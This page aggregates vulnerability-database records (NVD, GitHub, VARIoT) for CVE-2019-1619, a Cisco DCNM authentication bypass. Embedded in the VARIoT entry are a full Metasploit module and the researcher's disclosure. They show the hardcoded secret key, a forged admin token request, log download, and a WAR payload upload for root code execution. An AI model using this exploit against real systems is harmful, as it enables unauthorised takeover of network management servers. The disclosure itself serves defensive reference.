\"name\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", \"refsource\": \"MISC\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"CWE-284\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2019-1619\", \"STATE\": \"PUBLIC\", \"TITLE\": \"Cisco Data Center Network Manager Authentication Bypass Vulnerability\", \"ASSIGNER\": \"psirt@cisco.com\", \"DATE_PUBLIC\": \"2019-06-26T16:00:00-0700\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2019-1619\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-19T19:04:34.884Z\", \"dateReserved\": \"2018-12-06T00:00:00\", \"assignerOrgId\": \"d1c1063e-7a18-46af-9102-31f8928bc633\", \"datePublished\": \"2019-06-27T03:00:29.251400Z\", \"assignerShortName\": \"cisco\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2019-1619

Vulnerability from fkie_nvd - Published: 2019-06-27 03:15 - Updated: 2024-11-21 04:36

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
psirt@cisco.com	http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
psirt@cisco.com	http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
psirt@cisco.com	http://seclists.org/fulldisclosure/2019/Jul/7	Mailing List, Third Party Advisory
psirt@cisco.com	http://www.securityfocus.com/bid/108902	Third Party Advisory, VDB Entry
psirt@cisco.com	https://seclists.org/bugtraq/2019/Jul/11	Mailing List, Third Party Advisory
psirt@cisco.com	https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2019/Jul/7	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/108902	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://seclists.org/bugtraq/2019/Jul/11	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass	Vendor Advisory

Impacted products

	Vendor	Product	Version
	cisco	data_center_network_manager	10.4$2$

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:cisco:data_center_network_manager:10.4\\(2\\):*:*:*:*:*:*:*",
              "matchCriteriaId": "322E195C-0744-4D59-970C-75B731A4D4D9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad en el interfaz de administraci\u00f3n Web- based de Cisco Data Center Network Manager (DCNM) podr\u00eda permitir a un atacante remoto sin autorizaci\u00f3n eludir la identificaci\u00f3n y ejecutar acciones arbitrarias con privilegios administrativos en el dispositivo afectado. La vulnerabilidad es debido a una sesi\u00f3n de administraci\u00f3n incorrecta en el software afectado DCNM. Un atacante podr\u00eda explotar esta vulnerabilidad enviando una solicitud HTTP dise\u00f1ada al dispositivo afectado. Una operaci\u00f3n con \u00e9xito podr\u00eda permitir al atacante obtener acceso administrativo en el dispositivo afectado"
    }
  ],
  "id": "CVE-2019-1619",
  "lastModified": "2024-11-21T04:36:56.657",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "psirt@cisco.com",
        "type": "Secondary"
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-06-27T03:15:09.433",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/108902"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/bugtraq/2019/Jul/11"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/108902"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/bugtraq/2019/Jul/11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "psirt@cisco.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-798"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-HV79-5Q2X-QF8J

Vulnerability from github – Published: 2022-05-24 16:48 – Updated: 2022-05-24 16:48

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2019-1619"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-06-27T03:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.",
  "id": "GHSA-hv79-5q2x-qf8j",
  "modified": "2022-05-24T16:48:44Z",
  "published": "2022-05-24T16:48:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1619"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Jul/11"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/108902"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

VAR-201906-0566

Vulnerability from variot - Updated: 2024-02-13 22:54

A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. Cisco Data Center Network Manager (DCNM) Contains an access control vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Cisco DataCenter NetworkManager (DCNM) is Cisco's suite of data center network managers that enable multi-protocol management of the network and provide troubleshooting capabilities for the health and performance of the switch. This may lead to further attacks. This issue is being tracked by Cisco bug ID CSCvo64641. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). }, 'Author' => [ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-1619' ], # auth bypass [ 'CVE', '2019-1620' ], # file upload [ 'CVE', '2019-1622' ], # log download [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', {} ], [ 'Cisco DCNM 11.1(1)', {} ], [ 'Cisco DCNM 11.0(1)', {} ], [ 'Cisco DCNM 10.4(2)', {} ] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 26 2019' ))

register_options(
  [
    Opt::RPORT(443),
    OptBool.new('SSL', [true, 'Connect with TLS', true]),
    OptString.new('TARGETURI', [true,  "Default server path", '/']),
    OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
    OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
  ])

end

def check # at the moment this is the best way to detect # check if pmreport and fileUpload servlets return a 500 error with no params res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), 'vars_get' => { 'token' => rand_text_alpha(5..20) }, 'method' => 'GET' ) if res && res.code == 500 res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), 'method' => 'GET', ) if res && res.code == 500 return CheckCode::Detected end end

CheckCode::Unknown

end

def target_select if target != targets[0] return target else res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'), 'method' => 'GET' ) if res && res.code == 200 if res.body.include?('version":"11.1(1)') print_good("#{peer} - Detected DCNM 11.1(1)") print_status("#{peer} - No authentication required, ready to exploit!") return targets[1] elsif res.body.include?('version":"11.0(1)') print_good("#{peer} - Detected DCNM 11.0(1)") print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit") return targets[2] elsif res.body.include?('version":"10.4(2)') print_good("#{peer} - Detected DCNM 10.4(2)") print_status("#{peer} - No authentication required, ready to exploit!") return targets[3] else print_error("#{peer} - Failed to detect target version.") print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!") print_error(res.body) print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass") return targets[3] end end fail_with(Failure::NoTarget, "#{peer} - Failed to determine target") end end

def auth_v11 res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm/'), 'method' => 'GET', 'vars_get' => { 'userName' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }, )

if res && res.code == 200
  # get the JSESSIONID cookie
  if res.get_cookies
    res.get_cookies.split(';').each do |cok|
      if cok.include?("JSESSIONID")
        return cok
      end
    end
  end
end

end

def auth_v10 # step 1: get a JSESSIONID cookie and the server Date header res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm/'), 'method' => 'GET' )

# step 2: convert the Date header and create the auth hash
if res && res.headers['Date']
  jsession = res.get_cookies.split(';')[0]
  date = Time.httpdate(res.headers['Date'])
  server_date = date.strftime("%s").to_i * 1000
  print_good("#{peer} - Got sysTime value #{server_date.to_s}")

  # auth hash format:
  # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
  session_id = rand(1000..50000).to_s
  md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
    "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
  md5_str = Base64.strict_encode64(md5)

  # step 3: authenticate our cookie as admin
  # token format: sessionId.sysTime.md5_str.username
  res = send_request_cgi(
    'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
    'cookie' => jsession,
    'vars_get'  =>
    {
      'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
    },
    'method' => 'GET'
  )

  if res && res.code == 500
    return jsession
  end
end

end

# use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log def get_war_path res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'), 'method' => 'GET' )

if res && res.code == 200
  tmp = Tempfile.new
  # we have to drop this into a file first
  # else we will get a Zip::GPFBit3Error if we use an InputStream
  File.binwrite(tmp, res.body)
  Zip::File.open(tmp) do |zis|
    zis.each do |entry|
      if entry.name =~ /jboss[0-9]*\.log/
        fdata = zis.read(entry)
        if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
          tmp.close
          tmp.unlink
          return $1.strip
        end
      end
    end
  end
end

end

def exploit target = target_select

if target == targets[2]
  jsession = auth_v11
elsif target == targets[3]
  jsession = auth_v10
end

# targets[1] DCNM 11.1(1) doesn't need auth!
if jsession.nil? && target != targets[1]
  fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
elsif target != targets[1]
  print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
end

war_path = get_war_path
if war_path.nil? or war_path.empty?
  fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
else
  print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
end

# Generate our payload... and upload it
app_base = rand_text_alphanumeric(6..16)
war_payload = payload.encoded_war({ :app_name => app_base }).to_s

fname = app_base + '.war'
post_data = Rex::MIME::Message.new
post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
post_data.add_part(war_payload,
                   "application/octet-stream", 'binary',
                   "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
data = post_data.to_s

print_status("#{peer} - Uploading payload...")
res = send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
  'method' => 'POST',
  'data'   => data,
  'cookie' => jsession,
  'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
)

if res && res.code == 200 && res.body[/#{fname}/]
  print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")

  sleep 10

  print_status("#{peer} - Executing payload...")
  send_request_cgi(
    'uri'    => normalize_uri(target_uri.path, app_base),
    'method' => 'GET'
  )
else
  fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
end

end end . DCNM is widely deloyed in data centres worldwide to manage Cisco devices on a global scale.

DCNM 11.1(1) and below is affected by four vulnerabilities: authentication bypass, arbitrary file upload (leading to remote code execution), arbitrary file download and information disclosure via log download.

The table below lists the affected versions for each vulnerability:

Vulnerability Vulnerable? CVE <= 10.4(2) 11.0(1) 11.1(1) >= 11.2(1) Authentication bypass Yes No No No 2019-1619 File upload Yes, auth Yes, auth Yes, unauth No 2019-1620 File download Yes, auth Yes, auth Yes, unauth No 2019-1621 Info disclosure Yes, unauth Yes, unauth Yes, unauth ? 2019-1622

The authentication bypass affects versions 10.4(2), allowing an attacker to exploit the file upload for remote code execution. In version 11.0(1), authentication was introduced, and a valid unprivileged account is necessary to exploit all vulnerabilities except information discloure. Amazingly, in version 11.1(1) Cisco removed the authentication for the file upload and file download servlets, allowing an attacker exploit the vulnerabilities without any authentication! All vulnerabilities were fixed in 11.2(1), except the information disclosure, for which the status is unknown.

To achieve remote code execution with arbitrary file upload vulnerability, an attacker can write a WAR file in the Tomcat webapps folder. The Apache Tomcat server is running as root, meaning that the Java shell will run as root.

Agile Information Security would like to thank the iDefense Vulnerability Contributor Program for handling the disclosure process with Cisco [1]. DCNM 11 provides management, control, automation, monitoring, visualization, and troubleshooting across Cisco Nexus® and Cisco Multilayer Distributed Switching (MDS) solutions. DCNM 11 supports multitenant, multifabric infrastructure management for Cisco Nexus Switches. DCNM also supports storage management with the Cisco MDS 9000 family and Cisco Nexus switch storage functions. By abusing this servlet, an unauthenticated attacker can obtain a valid administrative session on the web interface [3].

The snippet of code below shows what the servlet does: com.cisco.dcbu.web.client.performance.ReportServlet

public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    Credentials cred = (Credentials)request.getSession().getAttribute("credentials");
    if((cred == null || !cred.isAuthenticated()) && !"fetch".equals(request.getParameter("command")) && !this.verifyToken(request)) {
        request.setAttribute("popUpSessionTO", "true");
    }

    this.doInteractiveChart(request, response);
}

The request is passed on to the verifyToken function, listed below: private boolean verifyToken(HttpServletRequest httpServletRequest) { String token = httpServletRequest.getParameter("token"); if(token == null) { return false; } else { try { FMServerRif serverRif = SQLLoader.getServerManager(); IscRif isc = serverRif.getIsc(StringEncrypter.encryptString("DESede", (new Date()).toString())); token = URLDecoder.decode(token, "UTF-8"); token = token.replace(' ', '+'); FMUserBase fmUserBase = isc.verifySSoToken(token); if(fmUserBase == null) { return false; } else { Credentials newCred = new Credentials(); int idx = fmUserBase.getUsername().indexOf(64); newCred.setUserName(idx == -1?fmUserBase.getUsername():fmUserBase.getUsername().substring(0, idx)); newCred.setPassword(StringEncrypter.DESedeDecrypt(fmUserBase.getEncryptedPassword())); newCred.setRole(fmUserBase.getRole()); newCred.setAuthenticated(true); httpServletRequest.getSession().setAttribute("credentials", newCred); return true; } } catch (Exception var8) { var8.printStackTrace(); return false; } } }

As it can be seen in the line: FMUserBase fmUserBase = isc.verifySSoToken(token); the HTTP request parameter "token" gets passed to IscRif.verifySsoToken, and if that function returns a valid user, the request is authenticated and credentials are stored in the session.

Let's dig deeper and find out what happens in IscRif.verifySsoToken. The class implementing is actually com.cisco.dcbu.sm.server.facade.IscImpl:

public FMUserBase verifySSoToken(String ssoToken) {
    return SecurityManager.verifySSoToken(ssoToken);
}

Digging further into SecurityManager.verifySSoToken: com.cisco.dcbu.sm.server.security.SecurityManager

public static FMUserBase verifySSoToken(String ssoToken) { String userName = null; FMUserBase fmUserBase = null; FMUser fmUser = null;

    try {
        userName = getSSoTokenUserName(ssoToken);
        if(confirmSSOToken(ssoToken)) {
            fmUser = UserManager.getInstance().findUser(userName);
            if(fmUser != null) {
                fmUserBase = new FMUserBase(userName, fmUser.getHashedPwd(), fmUser.getRoles());
            }

            if(fmUserBase == null) {
                fmUserBase = DCNMUserImpl.getFMUserBase(userName);
            }

            if(fmUserBase == null) {
                fmUserBase = FMSessionManager.getInstance().getFMUser(getSessionIdByToken(ssoToken));
            }
        }
    } catch (Exception var5) {
        _Logger.info("verifySSoToken: ", var5);
    }

    return fmUserBase;
}

As it can be seen in the code above, the username is obtained from the token here: userName = getSSoTokenUserName(ssoToken);

Digging yet another layer we find the following: public static String getSSoTokenUserName(String ssoToken) { return getSSoTokenDetails(ssoToken)[3]; }

private static String[] getSSoTokenDetails(String ssoToken) {
    String[] ret = new String[4];
    String separator = getTokenSeparator();
    StringTokenizer st = new StringTokenizer(ssoToken, separator);
    if(st.hasMoreTokens()) {
        ret[0] = st.nextToken();
        ret[1] = st.nextToken();
        ret[2] = st.nextToken();

        for(ret[3] = st.nextToken(); st.hasMoreTokens(); ret[3] = ret[3] + separator + st.nextToken()) {
            ;
        }
    }

    return ret;
}

Seems like the token is a string which is separated by the "separator" with four components, the fourth of which is the username.

Now going back to SecurityManager.verifySSoToken listed above, we see that after the call to getSSoTokenUserName, confirmSSOToken is called: public static FMUserBase verifySSoToken(String ssoToken) { (...) userName = getSSoTokenUserName(ssoToken); if(confirmSSOToken(ssoToken)) { fmUser = UserManager.getInstance().findUser(userName); if(fmUser != null) { fmUserBase = new FMUserBase(userName, fmUser.getHashedPwd(), fmUser.getRoles()); } (...) }

public static boolean confirmSSOToken(String ssoToken) {
    String userName = null;
    int sessionId = false;
    long sysTime = 0L;
    String digest = null;
    int count = false;
    boolean ret = false;

    try {
        String[] detail = getSSoTokenDetails(ssoToken);
        userName = detail[3];
        int sessionId = Integer.parseInt(detail[0]);
        sysTime = (new Long(detail[1])).longValue();
        if(System.currentTimeMillis() - sysTime > 600000L) {
            return ret;
        }

        digest = detail[2];
        if(digest != null && digest.equals(getMessageDigest("MD5", userName, sessionId, sysTime))) {
            ret = true;
            userNameTLC.set(userName);
        }
    } catch (Exception var9) {
        _Logger.info("confirmSSoToken: ", var9);
    }

    return ret;
}

Now we can further understand the token. It seems it is composed of: sessionId + separator + sysTime + separator + digest + separator + username

And what is the digest? Let's look into the getMessageDigest function:

    private static String getMessageDigest(String algorithm, String userName, int sessionid, long sysTime) throws Exception {
        String input = userName + sessionid + sysTime + SECRETKEY;
        MessageDigest md = MessageDigest.getInstance(algorithm);
        md.update(input.getBytes());
        return new String(Base64.encodeBase64((byte[])md.digest()));
    }

It is nothing more than the MD5 of: userName + sessionid + sysTime + SECRETKEY

... and SECRETKEY is a fixed key in the code: private static final String SECRETKEY = "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF";

... while the separator is a ".": private static String getTokenSeparator() { return System.getProperty("security.tokenSeparator", "."); }

In summary, this is what happens: The ReportServlet will happily authenticate any request, as long as it receives a token in the following format: sessionId.sysTime.MD5(userName + sessionid + sysTime + SECRETKEY).username

The sessionId can be made up by the user, sysTime can be obtained by getting the server Date HTTP header and then converting to milliseconds, and we know the SECRETKEY and the username, so now we can authenticate as any user. Here's an example token: GET /fm/pmreport?token=1337.1535935659000.upjVgZQmxNNgaXo5Ga6jvQ==.admin

This request will return a 500 error due to the lack of some parameters necessary for the servlet to execute correctly, however it will also successfully authenticate us to the server, which will cause it to return a JSESSIONID cookie with valid authenticated session for the admin user. Note that the user has to be valid. The "admin" user is a safe bet as it is present by default in all systems, and it is also the most privileged user in the system.

Unfortunately, this technique does not work for 11.0(1). I believe this is not because the vulnerability was fixed, as the exact same code is present in the newer version. In 11.0(1), the ReportServlet.verifyToken function crashes with an exception in the line noted below:

private boolean verifyToken(HttpServletRequest httpServletRequest) { (...) Credentials newCred = new Credentials(); int idx = fmUserBase.getUsername().indexOf(64); newCred.setUserName(idx == -1?fmUserBase.getUsername():fmUserBase.getUsername().substring(0, idx)); newCred.setPassword(StringEncrypter.DESedeDecrypt(fmUserBase.getEncryptedPassword())); <--- exception occurs here newCred.setRole(fmUserBase.getRole()); newCred.setAuthenticated(true); httpServletRequest.getSession().setAttribute("credentials", newCred); return true; } } catch (Exception var8) { var8.printStackTrace(); return false; } (...) }

The exception returned is a "com.cisco.dcbu.lib.util.StringEncrypter$EncryptionException: javax.crypto.BadPaddingException: Given final block not properly padded". This will cause execution to go into the catch block shown above, and the function will return false, so the JSESSIONID cookie returned by the server will not have the credentials stored in it.

I believe this is purely a coding mistake - Cisco updated their password encryption method, but failed to update their own code. Unless this ReportServlet code is deprecated, this is a real bug that happens to fix a security vulnerability by accident.

On version 11.0(1), it seems that the ReportServlet has been removed from the corresponding WAR xml mapping file, so requesting that URL now returns an HTTP 404 error. An authenticated user can abuse this servlet to upload files to an arbitrary directory and ultimately achieve remote code execution [4].

The code for this servlet is listed below: com.cisco.dcbu.web.client.reports.FileUploadServlet

public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    this.doGet(request, response);
}

public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    Credentials cred = (Credentials)((Object)request.getSession().getAttribute("credentials"));
    if (cred == null || !cred.isAuthenticated()) {
        throw new ServletException("User not logged in or Session timed out.");
    }
    this.handleUpload(request, response);
}

The code shown above is simple, and the request is passed onto handleUpload:

private void handleUpload(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    response.setContentType(CONTENT_TYPE);
    PrintWriter out = null;
    ArrayList<String> allowedFormats = new ArrayList<String>();
    allowedFormats.add("jpeg");
    allowedFormats.add("png");
    allowedFormats.add("gif");
    allowedFormats.add("jpg");
    allowedFormats.add("cert");
    File disk = null;
    FileItem item = null;
    DiskFileItemFactory factory = new DiskFileItemFactory();
    String statusMessage = "";
    String fname = "";
    String uploadDir = "";
    ListIterator iterator = null;
    List items = null;
    ServletFileUpload upload = new ServletFileUpload((FileItemFactory)factory);
    TransformerHandler hd = null;
    try {
        out = response.getWriter();
        StreamResult streamResult = new StreamResult(out);
        SAXTransformerFactory tf = (SAXTransformerFactory)SAXTransformerFactory.newInstance();
        items = upload.parseRequest(request);
        iterator = items.listIterator();
        hd = tf.newTransformerHandler();
        Transformer serializer = hd.getTransformer();
        serializer.setOutputProperty("encoding", "UTF-8");
        serializer.setOutputProperty("doctype-system", "response.dtd");
        serializer.setOutputProperty("indent", "yes");
        serializer.setOutputProperty("method", "xml");
        hd.setResult(streamResult);
        hd.startDocument();
        AttributesImpl atts = new AttributesImpl();
        hd.startElement("", "", "response", atts);
        while (iterator.hasNext()) {
            atts.clear();
            item = (FileItem)iterator.next();
            if (item.isFormField()) {
                if (item.getFieldName().equalsIgnoreCase("fname")) {
                    fname = item.getString();
                }
